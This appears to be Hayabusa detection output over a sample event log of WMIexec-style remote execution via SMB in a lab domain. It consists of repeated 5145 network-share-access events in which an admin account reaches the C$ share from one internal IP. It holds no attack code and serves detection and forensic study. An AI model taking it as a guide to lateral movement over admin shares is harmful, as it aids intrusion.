0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.811 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.827 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.843 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.858 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.890 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.907 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 